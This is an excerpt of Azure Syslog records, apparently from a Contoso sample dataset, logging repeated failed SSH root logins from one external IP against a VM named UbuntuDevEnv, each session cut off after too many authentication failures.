+8054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:30,UbuntuDevEnv,2019-06-11 18:51:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 40910 ssh2 [preauth],37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,40910,,
+8055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:30,UbuntuDevEnv,2019-06-11 18:51:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37185,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:33,UbuntuDevEnv,2019-06-11 18:51:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:35,UbuntuDevEnv,2019-06-11 18:51:35,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 48173 ssh2,37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,48173,,
+8058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:49,UbuntuDevEnv,2019-06-11 18:51:49,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 48173: Too many authentication failures [preauth],37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,48173,,
+8059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:49,UbuntuDevEnv,2019-06-11 18:51:49,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:49,UbuntuDevEnv,2019-06-11 18:51:49,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 48173 ssh2 [preauth],37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,48173,,
+8061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:49,UbuntuDevEnv,2019-06-11 18:51:49,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:49,UbuntuDevEnv,2019-06-11 18:51:49,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 48173 ssh2],37257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,48173,,
+8063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:53,UbuntuDevEnv,2019-06-11 18:51:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:51:54,UbuntuDevEnv,2019-06-11 18:51:54,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 55319 ssh2,37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55319,,
+8065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:02,UbuntuDevEnv,2019-06-11 18:52:00,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 55319 ssh2],37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55319,,
+8066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:03,UbuntuDevEnv,2019-06-11 18:52:02,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 55319 ssh2,37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55319,,
+8067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:08,UbuntuDevEnv,2019-06-11 18:52:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 55319 ssh2 [preauth],37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55319,,
+8068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:08,UbuntuDevEnv,2019-06-11 18:52:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 55319 ssh2],37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55319,,
+8069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:08,UbuntuDevEnv,2019-06-11 18:52:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:08,UbuntuDevEnv,2019-06-11 18:52:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 55319: Too many authentication failures [preauth],37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,55319,,
+8071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:08,UbuntuDevEnv,2019-06-11 18:52:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:13,UbuntuDevEnv,2019-06-11 18:52:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:14,UbuntuDevEnv,2019-06-11 18:52:14,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 62661 ssh2,37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,62661,,
+8074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:27,UbuntuDevEnv,2019-06-11 18:52:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 62661 ssh2],37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,62661,,
+8075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:27,UbuntuDevEnv,2019-06-11 18:52:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 62661 ssh2 [preauth],37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,62661,,
+8076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:27,UbuntuDevEnv,2019-06-11 18:52:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 62661: Too many authentication failures [preauth],37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,62661,,
+8077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:27,UbuntuDevEnv,2019-06-11 18:52:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:27,UbuntuDevEnv,2019-06-11 18:52:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:32,UbuntuDevEnv,2019-06-11 18:52:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:34,UbuntuDevEnv,2019-06-11 18:52:33,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 5628 ssh2,37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,5628,,
+8081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:47,UbuntuDevEnv,2019-06-11 18:52:47,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:47,UbuntuDevEnv,2019-06-11 18:52:47,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 5628 ssh2 [preauth],37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,5628,,
+8083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:47,UbuntuDevEnv,2019-06-11 18:52:47,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 5628 ssh2],37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,5628,,
+8084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:47,UbuntuDevEnv,2019-06-11 18:52:47,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:47,UbuntuDevEnv,2019-06-11 18:52:47,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 5628: Too many authentication failures [preauth],37475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,5628,,
+8086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:51,UbuntuDevEnv,2019-06-11 18:52:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:52:52,UbuntuDevEnv,2019-06-11 18:52:52,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 13026 ssh2,37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,13026,,
+8088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:02,UbuntuDevEnv,2019-06-11 18:53:01,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 61.177.172.128 port 13026 ssh2],37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,13026,,
+8089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:04,UbuntuDevEnv,2019-06-11 18:53:03,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 13026 ssh2,37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,13026,,
+8090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:07,UbuntuDevEnv,2019-06-11 18:53:06,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:07,UbuntuDevEnv,2019-06-11 18:53:06,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 13026 ssh2 [preauth],37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,13026,,
+8092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:07,UbuntuDevEnv,2019-06-11 18:53:06,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 13026: Too many authentication failures [preauth],37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,13026,,
+8093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:07,UbuntuDevEnv,2019-06-11 18:53:06,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:07,UbuntuDevEnv,2019-06-11 18:53:06,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 13026 ssh2,37538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,13026,,
+8095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:12,UbuntuDevEnv,2019-06-11 18:53:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:13,UbuntuDevEnv,2019-06-11 18:53:13,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 20599 ssh2,37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,20599,,
+8097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:26,UbuntuDevEnv,2019-06-11 18:53:26,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 20599 ssh2 [preauth],37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,20599,,
+8098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:26,UbuntuDevEnv,2019-06-11 18:53:26,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 20599 ssh2],37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,20599,,
+8099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:26,UbuntuDevEnv,2019-06-11 18:53:26,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:26,UbuntuDevEnv,2019-06-11 18:53:26,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:26,UbuntuDevEnv,2019-06-11 18:53:26,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 20599: Too many authentication failures [preauth],37606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,20599,,
+8102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:30,UbuntuDevEnv,2019-06-11 18:53:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:31,UbuntuDevEnv,2019-06-11 18:53:31,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 28089 ssh2,37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,28089,,
+8104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:44,UbuntuDevEnv,2019-06-11 18:53:44,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 28089: Too many authentication failures [preauth],37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,28089,,
+8105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:44,UbuntuDevEnv,2019-06-11 18:53:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 28089 ssh2 [preauth],37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,28089,,
+8106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:44,UbuntuDevEnv,2019-06-11 18:53:44,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 28089 ssh2],37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,28089,,
+8107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:44,UbuntuDevEnv,2019-06-11 18:53:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:44,UbuntuDevEnv,2019-06-11 18:53:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:48,UbuntuDevEnv,2019-06-11 18:53:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:53:49,UbuntuDevEnv,2019-06-11 18:53:48,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 35312 ssh2,37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,35312,,
+8111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:02,UbuntuDevEnv,2019-06-11 18:53:59,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 35312 ssh2],37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,35312,,
+8112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:03,UbuntuDevEnv,2019-06-11 18:54:02,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 35312: Too many authentication failures [preauth],37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,35312,,
